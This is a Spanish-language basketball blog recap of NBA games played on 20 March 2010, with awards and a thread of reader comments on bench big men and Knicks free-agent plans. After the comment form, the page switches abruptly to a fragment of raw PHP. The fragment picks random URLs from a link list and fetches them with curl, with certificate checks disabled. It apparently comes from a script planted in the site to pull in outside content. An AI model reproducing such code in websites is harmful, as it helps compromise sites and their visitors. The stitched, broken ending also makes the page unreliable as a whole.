La crónica (20/03/2010)

21 de March de 2010 por TheDeerHunter

Extraordinario partido de los Celtics, en una complicada plaza como es ahora mismo el American Airlines Center de Dallas. Son los dos terceros eventuales de ambas conferencias. Una medida significativa de cómo están de muertos los hombres de Boston. Partidazo de Pierce (por segunda noche consecutiva), Rondo y Ray Allen. No tanto de Garnett, quien seguramente afronta peor los partidos con menos de 48 horas de diferencia. Por los Mavs fallaron estrepitosamente Butler y Haywood.

No fueron capaces los Nuggets de ampliar distancias frente a los Bucks en Denver. Dicen que Mbah a Moute tuvo mucho que ver con que Melo únicamente anotara 29 puntos. Lo cierto es que algo de eso hubo, porque los locales anotaron menos de un 40% de sus tiros. Entre Billups, Melo y JR Smith acumularon un 20 de 72. Salmons, Delfino e Ilyasova firmaron un 20 de 39. Es lo más ilustrativo que podemos señalar del choque.

Los Jazz, sin embargo, sí ganaron contra New Orleans. Millsap hizo un roto importante en la zona de los Hornets aprovechando bien la expulsión de David West por falta flagrante. Por su parte, los Heat tumbaron a los Bobcats en otro partido a menos de 80 puntos. Wade estuvo bastante discreto cara al aro pero fue fundamental en los intangibles. Los Grizzlies, aún con Marc Gasol todavía lesionado, se parecieron a los Kings de la época dorada en su partido contra los Warriors y Chris Bosh a un semidios frente a los Nets. Anoche puso a examen el desplazamiento lateral de Brook López. Le cayó un gran suspenso aunque en ataque estuvo más fino. Finalmente los Bulls ganaron a los Sixers. Tendría mucho delito que este equipo terminara clasificando para postemporada.

PREMIOS

MVP: . 38 puntos, 8 rebotes. Tendrá que hacer muchas de estas para pasar de primera ronda.

El rookie: Thornton y Collison. 41 puntos, 10 asistencias, 7 rebotes entre ambos. Si tuvieran aspiración para ganar el RoY tendrían que hacerles compartirlo.

La sorpresa: No es que dudemos de la capacidad de Paul Millsap, pero salir desde el banquillo hace que sea complicado ser el mejor de tu equipo.

La decepción: Los nuevos mega-fichajes de Dallas, Butler & Haywood, combinaron 12 puntos con 4 de 17 en tiros. No es algo preocupante.

El mayor esfuerzo en vano: Por segundo partido consecutivo, Monta Ellis. 28 puntitos con buenos porcentajes y 5 robos.

Comenta

19 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Como Pierce y Allen lleguen finos a Play-Offs ya tenemos a los Celtics dando verdadera guerra a los Magics en 2ª ronda, mas aun con el tiempo de descanso que pueden tener y que le vendrá de perlas a Garnett.

    Millsap es posiblemente el mejor suplente interior de la liga.

      Citar

  2. sergio dice:
    #2

    Los Celtics no ganaran la NBA, pero esta claro que un susto se lo pueden dar a cualquiera y no van a ser faciles de eliminar en ningun caso, por muchos Lakers, Cavs o Magic que se les crucen por medio.

    Dirk, si no es el mejor desde luego esta entre los mejores. Asi a bote pronto se me ocurre Odom, Brad Miller, Kevin Love o Varejao.

      Citar

  3. Viva_Dirk dice:
    #3

    No considero a Odom un jugador netamente interior, Brad Miller ya no es lo que era, Varejao me parece bastante inferior a Millsap y no entiendo porque Kevin Love no es titular, este si es un jugadorazo.

      Citar

  4. LEmontus dice:
    #4

    Love no es titular porque minesota se está dedicando a probar cosas y con love no hay nada que probar puede ser perfectamente un 20-10 por otro lado están confiando mucho en flyn lo quieren como base para el futuro y personalmente creo que se equivoctsan.

    Los mejores suplentes interiores a vote pronto para mi son Millsap y quizas sea solo mejor anthony randolph, por debajo de estos estarían J.Thompson y Warrick y luego meteria en un mismo grupo a T thomas, Glen davis,ibaka(varejao tiene la suerte de entenderse a la perfececcion con james lo que le hace ser un buen defensor de 10 puntos, sin james no llevaria 10 puntos y hay mejores defensores en la nba) y en un futuro habra que ver a hansbrough y speights.

      Citar

  5. Txusma dice:
    #5

    Lo de Love y Jefferson es una auténtica pena porque me parecen una pareja bestial aunq algo falta de centimetros. Me da que en verano vamos a ver como el ex de los Celtics hace las maletas y con la buena cantidad de equipos que hay con espacio salarial pueda convertirse en el premio de consolidación de alguna franquicia.

      Citar

  6. pcerezo dice:
    #6

    Pues se me ocurre un quinteto formado por Base (a decidir)-Joe Johnson-Rudy Gay-Chris Bosh-Al Jefferson para los Knicks, no estaría mal?

    Pablo

      Citar

  7. Txusma dice:
    #7

    Los Knicks tienen mucho espacio salarial pero no sé si llegan a tanto como para fichar a Bosh, Gay y Johnson.

      Citar

  8. Love Denise dice:
    #8

    demasiados fichajes para knicks no, pablo? un base está claro que será Toney Douglas, que está haciendo un muy buen final de temporada, y aprovechando las oportunidades que le han dado

      Citar

  9. Love Denise dice:
    #9

    Como suplente interior, yo también destacaría, aparte de los mencionados a Gortat, ya sé que sus números son muy discretos, pero es que con Howard delante…..
    en cualquier otro equipo haría sus 14-10 fácilmente

      Citar

  10. pcerezo dice:
    #10

    Han estado mas de 100millones de dólares en salarios durante seis años y no han llegado a postemporada. Tony Douglas ayer le vi y me parece una versión muy mala de Tinsley.

      Citar

  11. Love Denise dice:
    #11

    no, si yo no digo que toney Douglas sea el nuevo Maravich, pero pienso que con lo joven que es y los partidos de los últimos días, tiene un hueco en estso knicks al menos como 2ºbase (en funcio tambien de lo que fichen).
    Te parecerá una versión mala de tinsley, pero es el unico base con algo de nivel en estos Knicks, porque el rendimiento de Duhon es de escandalo.

      Citar

  12. LEmontus dice:
    #12

    Yo creo que decir que douglas sera el base titular de Knicks con todo el espacio salarial….lo veo muy dificil ahora sí todavia tiene 13 o 14 partidos para seguir demostrando su valía y si sigue a buen nivel seguramente le dan ficha como 2º base. A mi personalmente me parece que puede llegar a ser un buen base titular pero todavía esta verde.

      Citar

  13. Viva_Dirk dice:
    #13

    Estoy deacuerdo en que Gortat es un buen suplente, pero decir que haria 14-10 jugando de titular me parece una locura, solo hay 10 jugadores que promedien 10 rebotes esta campaña, el peor de ellos Troy Murphy, y de esos 10 solo hay 3 centers tan puros como Gortat y uno de ellos promedia 7 puntos.

    Vamos que 14 puntos me parecen muchísimos para Gortat y coger 10 rebotes no es facil.

    En cuanto a los Knicks, siempre he dicho que Joe Johnson-Bosh me parecerian unos fichajes cojonudos, acompañados de un base por la mid-level y si hay dinero para Jefferson seria otro pedazo de fichaje.

      Citar

  14. TheDeerHunter dice:
    #14

    El caso es que a mí Al Jefferson comienza a parecerme uno de esos sospechosos habituales peleados con la báscula.

      Citar

  15. Love Denise dice:
    #15

    sobre gortat, sigo pensando que haría facilmente un 14-10 jugando 36 min. Su defensa es buena, agresiva, y creo que llegaría fácilmente a los 10 rebotes y 2 tapones por partido. En ataque, sé que no tiene los movimientos de Olajuwon o la contundencia del mismo Howard, es decir, sus 14 puntos no vendrían por canastas 1×1 por calidad, sino con un par de mates, algunos tiros libres, alguna canasta fácil después de coger un rebote ofensivo y con algún otro gancho… yo creo que esos números están a su alcance, quizás no en un equipo con tantos recursos ofensivos como los Magic, pero sí en otros equipos tipo Pacers, Kings, inclusive los Heat. Conclusión: me parece un pivot muy válido para la NBA y sería titular en más del 50% de lso equipos actualmente.

      Citar

  16. LEmontus dice:
    #16

    Yo tampoco creo q

      Citar

  17. LEmontus dice:
    #17

    Yo tampoco creo que gortat sea un 14-10 y menos facilmente… me parece un buen suplente y quizás si podría llegar 8 o 7 rebotes pero 14 puntos lo dudaría. Aunque claro habría que verlo.

      Citar

  18. Love Denise dice:
    #18

    pues sí, habría que verlo en esa tesitura

      Citar

  19. Love Denise dice:
    #19

    como dato sobre Gortat: en los 16 partidos en que ha jugado más de 20 minutos este año, sus promedios son de 24 minutos, 6 puntos y casi 8 rebotes. Sigo pensando que si jugara más minutos y en un equipo con aspiraciones menores de los que luchan por la 8º plaza de PO y por ende, con un rol más importante dentro del equipo, podría ser un center de 14-10

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>